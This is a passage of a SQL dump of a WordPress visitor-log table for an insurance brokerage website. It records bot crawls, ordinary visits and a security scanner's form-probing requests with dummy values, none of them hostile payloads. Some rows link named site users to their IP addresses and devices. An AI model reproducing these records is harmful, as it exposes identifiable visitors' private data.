+http://ahrefs.com/robot/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(7785,'0b_62c70df005b68c28d6f2a6e99cce0aea','1458651695','207.46.13.175','msnbot-207-46-13-175.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7788,'0b_49d6f9ab89b5a169fe0da81fcbfb80e7','1458651869','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(7791,'0b_f7ff89d18a248f21d4a5f1238d4ac440','1458651899','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7793,'0b_f7ff89d18a248f21d4a5f1238d4ac440','1458651900','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(7796,'0b_0c303e6a04b8ac75de7c1ca63f3ef9f4','1458652711','195.154.200.68','195-154-200-68.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(7799,'0b_0c303e6a04b8ac75de7c1ca63f3ef9f4','1458652725','195.154.200.68','195-154-200-68.rev.poneytelecom.eu','/?p=288','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(7800,'0b_0c303e6a04b8ac75de7c1ca63f3ef9f4','1458652730','195.154.200.68','195-154-200-68.rev.poneytelecom.eu','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(7802,'0b_f7ff89d18a248f21d4a5f1238d4ac440','1458653238','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(7803,'0b_6baa64b3c859fa035cdfadd0ada1d004','1458653382','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7806,'0b_3b63e0d5fc598786c6b6cd744c7bf9d0','1458654626','157.55.39.48','msnbot-157-55-39-48.search.msn.com','[404] /pdf/bankers_companies_ok_to_convert_from.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(7808,'0b_5e9dfa1126dabf4a272466bd67f9b74a','1458654841','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(7809,'0b_5e9dfa1126dabf4a272466bd67f9b74a','1458654842','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(7811,'0b_b1295c99d784a3a6b55883fde57461e0','1458655847','100.43.81.146','spider-100-43-81-146.yandex.com','/SSO/235_39.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(7814,'0b_e4f35acfeded7299bffab3ed1bdcaebe','1458656026','142.114.255.229','142.114.255.229','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(7815,'0b_39ec89d2061dd11bd705bf32b1c0f9b8','1458657046','184.75.114.7','rrcs-184-75-114-7.nyc.biz.rr.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E234 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','','','','','','','0','0',0),(7817,'0b_39ec89d2061dd11bd705bf32b1c0f9b8','1458657047','184.75.114.7','rrcs-184-75-114-7.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E234 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','','','','','','','0','0',0),(7820,'0b_6bb54914f59cd18d51a00902e02823ac','1458657385','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(7823,'0b_d30cbb2c81af43ec7ae197baa22fbb8e','1458657756','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(7826,'0b_d30cbb2c81af43ec7ae197baa22fbb8e','1458657757','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(7829,'0b_d30cbb2c81af43ec7ae197baa22fbb8e','1458657759','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(7832,'0b_d30cbb2c81af43ec7ae197baa22fbb8e','1458657765','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(7833,'0b_07808b27b66b86bfbdb28227aaaa8c0f','1458657864','208.115.111.66','208-115-111-66-reverse.wowrack.com','/home/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(7836,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658924','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7838,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658929','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7839,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658931','184.154.139.23','placeholder.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7841,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658935','184.154.139.23','placeholder.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7842,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658938','184.154.139.23','placeholder.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7844,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658940','184.154.139.23','placeholder.sitelock.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7847,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658943','184.154.139.23','placeholder.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7850,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658946','184.154.139.23','placeholder.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7851,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658950','184.154.139.23','placeholder.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7853,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658954','184.154.139.23','placeholder.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7856,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658956','184.154.139.23','placeholder.sitelock.com','/register/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7857,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658958','184.154.139.23','placeholder.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7860,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458658961','184.154.139.23','placeholder.sitelock.com','/?page_id=169','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7863,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658961','184.154.139.23','placeholder.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7866,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658969','184.154.139.23','placeholder.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7869,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658975','184.154.139.23','placeholder.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7871,'0b_799da1979bf0afe2c1326d2fa9484230','1458658976','47.16.162.38','ool-2f10a226.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(7872,'0b_799da1979bf0afe2c1326d2fa9484230','1458658977','47.16.162.38','ool-2f10a226.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(7875,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658977','184.154.139.23','placeholder.sitelock.com','/carriers/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7877,'0b_799da1979bf0afe2c1326d2fa9484230','1458658978','47.16.162.38','ool-2f10a226.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(7878,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658979','184.154.139.23','placeholder.sitelock.com','/agent-tools/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7880,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658982','184.154.139.23','placeholder.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7883,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658984','184.154.139.23','placeholder.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7886,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658986','184.154.139.23','placeholder.sitelock.com','/about-us/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7889,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658988','184.154.139.23','placeholder.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7892,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658991','184.154.139.23','placeholder.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7893,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658994','184.154.139.23','placeholder.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7895,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658995','184.154.139.23','placeholder.sitelock.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7898,'0b_799da1979bf0afe2c1326d2fa9484230','1458658998','47.16.162.38','ool-2f10a226.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(7901,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658997','184.154.139.23','placeholder.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7904,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458658999','184.154.139.23','placeholder.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7905,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659001','184.154.139.23','placeholder.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7908,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659003','184.154.139.23','placeholder.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7910,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659005','184.154.139.23','placeholder.sitelock.com','/igo/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7913,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659007','184.154.139.23','placeholder.sitelock.com','/case-status/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7916,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659011','184.154.139.23','placeholder.sitelock.com','/term-quotes/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7917,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659014','184.154.139.23','placeholder.sitelock.com','/licensing-contracting/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7919,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659015','184.154.139.23','placeholder.sitelock.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7920,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659017','184.154.139.23','placeholder.sitelock.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7923,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659021','184.154.139.23','placeholder.sitelock.com','/meet-the-eib-team/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7925,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659023','184.154.139.23','placeholder.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7926,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659025','184.154.139.23','placeholder.sitelock.com','/?p=290','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7928,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659026','184.154.139.23','placeholder.sitelock.com','/agent-tools/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/agent-tools/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7931,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659027','184.154.139.23','placeholder.sitelock.com','/?p=283','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7934,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659031','184.154.139.23','placeholder.sitelock.com','/contact/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7935,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659032','184.154.139.23','placeholder.sitelock.com','/register/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/register/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7937,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659032','184.154.139.23','placeholder.sitelock.com','/licensing-contracting/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/licensing-contracting/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7938,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659033','184.154.139.23','placeholder.sitelock.com','/term-quotes/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/term-quotes/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7940,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659034','184.154.139.23','placeholder.sitelock.com','/forms/?Submit=Log%20In&a=login&log=1&pwd=1&redirect_to=http://www.empireins.com/forms/&rememberme=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7941,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659035','184.154.139.23','placeholder.sitelock.com','/case-status/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/case-status/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7943,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659036','184.154.139.23','placeholder.sitelock.com','/carriers/?a=register&addr1=1&addr2=1&city=1&country=1&first_name=1&last_name=1&log=1&phone1=1&redirect_to=http://www.empireins.com/carriers/&submit=Register&thestate=1&user_email=1&zip=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7944,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659037','184.154.139.23','placeholder.sitelock.com','/forms/?Submit=Log%20In&a=login&log=1&pwd=1&redirect_to=http:/www.empireins.com/forms/&rememberme=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7946,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659038','184.154.139.23','placeholder.sitelock.com','/?page_id=171?a=pwdreset','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0); INSERT INTO `wp_wassup` VALUES (7949,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659039','184.154.139.23','placeholder.sitelock.com','/members/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7952,'0b_1dd685f3d65631017eca7d7ccf4358a3','1458659039','184.154.139.23','placeholder.sitelock.com','/members/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','Unknown Spider','','','','3','0',0),(7953,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659040','184.154.139.23','placeholder.sitelock.com','/?p=181','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7955,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659041','184.154.139.23','placeholder.sitelock.com','/?p=309','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7956,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659041','184.154.139.23','placeholder.sitelock.com','/?p=185','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7959,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659042','184.154.139.23','placeholder.sitelock.com','/?p=169','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7961,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659043','184.154.139.23','placeholder.sitelock.com','/?p=306','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7962,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659043','184.154.139.23','placeholder.sitelock.com','/?p=8','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7964,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659046','184.154.139.23','placeholder.sitelock.com','/?p=10','SiteLockSpider [en] (WinNT; I 